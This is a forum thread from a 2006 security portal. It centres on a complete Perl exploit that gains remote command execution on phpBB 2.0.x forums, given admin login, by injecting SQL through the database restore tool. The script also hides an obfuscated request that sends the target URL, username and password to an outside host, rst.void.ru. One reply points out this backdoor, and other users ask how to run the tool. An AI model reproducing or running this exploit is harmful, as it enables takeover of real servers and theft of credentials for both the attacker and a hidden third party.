|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 84
Members: 0
Total: 84
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpBB admin =>2.0.19 exec exploit |
|
Posted: Tue Apr 11, 2006 8:02 am |
|
|
baubau |
Regular user |
|
|
Joined: Mar 17, 2006 |
Posts: 7 |
Location: Lithuania |
|
|
|
|
|
|
For me does not work ?
Code: | #!/usr/bin/perl
## r57phpbba2e2.pl - phpBB admin 2 exec exploit
## version 2 (based on user_sig_bbcode_uid bug)
## tested on 2.0.12 , 2.0.13 , 2.0.19
## --------------------------------------------
## screen
## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
## Command for execute or 'exit' for exit # id
## uid=80(www) gid=80(www) groups=80(www)
## Command for execute or 'exit' for exit # exit
## --------------------------------------------
## *** surprise included ;)
## 20/02/06
## 1dt.w0lf
## RST/GHC (http://rst.void.ru , http://ghc.ru)
use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;
getopts("u:L:P:i:p:o:");
$url = $opt_u;
$login = $opt_L;
$password = $opt_P;
$id = $opt_i || 2;
$prefix = $opt_p || 'phpbb_';
$proxy = $opt_o;
if(!$url || !$login || !$password){&usage;}
$|++;
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
$ids = 'IDS:r57 phpBB2 exploit a2e220022006|'.$url.'|'.$login.'|'.$password.'|'.$ id.'|'.$prefix;
$res = $xpl->post($url.'login.php',
[
"username" => "$login",
"password" => "$password",
"autologin" => "on",
"admin" => "1",
"login" => "Log in",
],"User-Agent" => "$ids");
$cookie_jar->extract_cookies($res);
if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }
$xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?ids='.$ids);
while ()
{
print "Command for execute or 'exit' for exit # ";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
exit() if ($cmd eq 'exit');
last;
}
&run($cmd);
}
sub run($)
{
$sql = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
&phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);
$res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
@result = split(/\n/,$res->content);
$data = '';
$on = $start = $end = 0;
for (@result)
{
if (/_END_/) { $end = 1; last; }
if ($on) { $data .= $_."\n"; }
if (/_START_/) { $on = 1; $start = 1; }
}
if($start&&$end) { print $data."\r\n"; }
}
sub phpbb_sql_query($$){
$res = $xpl->post("$_[0]",
Content_type => 'form-data',
Content => [
perform => 'restore',
restore_start => 'Start Restore',
backup_file => [
undef,
'0wneeeeedddd',
Content_type => 'text/plain',
Content => "$_[1]",
],
]
,"User-Agent" => "$ids");
}
sub usage()
{
&about();
print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
print " Options:\r\n";
print " -u [URL] - path to forum e.g. http://site/forum/\r\n";
print " -L [login] - admin login\r\n";
print " -P [password] - admin password\r\n";
print " -i [id] - admin id (optional, default 2)\r\n";
print " -p [prefix] - table prefix (optional, default phpbb_)\r\n";
print " -o [host:port] - proxy (optional)\r\n";
exit();
}
sub about()
{
print "\\=-----------------------------------=/\r\n";
print "| phpBB admin2exec exploit by RST/GHC |\r\n";
print "| version 2 (user_sig_bbcode_uid) |\r\n";
print "/=-----------------------------------=\\\r\n";
return 'http://rst.void.ru';
} |
Probably as always it is necessary to correct it(him) ? |
|
|
|
|
|
|
|
|
Posted: Wed Apr 12, 2006 3:51 pm |
|
|
naragorn |
Regular user |
|
|
Joined: Apr 03, 2006 |
Posts: 10 |
|
|
|
|
|
|
|
this exploits works, but it sends passwords to a defined site, using a background process
delete this lines so u wont see ur forum compromised(If u used this exploit without knowing that it sends info to a 3rd party site
Code: |
So what to do to avoid sending info??
Delete tthe line showed below
sub about()
{
print "\\=-----------------------------------=/\r\n";
print "| phpBB admin2exec exploit by RST/GHC |\r\n";
print "| version 2 (user_sig_bbcode_uid) |\r\n";
print "/=-----------------------------------=\\\r\n";
return 'http://rst.void.ru'; ----- DELETE THIS LINE
}
And just to be sure delete this line too
$xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?ids='.$ids);
|
|
|
|
|
|
Posted: Sun Apr 16, 2006 4:01 pm |
|
|
sljyro |
Advanced user |
|
|
Joined: Mar 23, 2006 |
Posts: 53 |
|
|
|
|
|
|
|
i dont understand how to make this work. any help? thanks in advance |
|
|
|
|
Posted: Fri Apr 21, 2006 12:30 pm |
|
|
Benna |
Regular user |
|
|
Joined: Apr 16, 2006 |
Posts: 20 |
|
|
|
|
|
|
|
I have deleted this lines but i don't know the command required for start the exploit
the exploit print:
Code: | Command for execute or 'exit' for exit # |
|
|
|
|
|
Posted: Fri Apr 21, 2006 3:04 pm |
|
|
0x01 |
Regular user |
|
|
Joined: Mar 31, 2006 |
Posts: 7 |
|
|
|
|
|
|
|
you musst have the login data from the forum, this is only for command
is not for hack an login
mfg |
|
|
|
|
Posted: Fri Apr 21, 2006 5:53 pm |
|
|
Benna |
Regular user |
|
|
Joined: Apr 16, 2006 |
Posts: 20 |
|
|
|
|
|
|
|
sorry for the english bit i am from italy.
i can set me as admin with this?
tanks in advnce.
benna |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|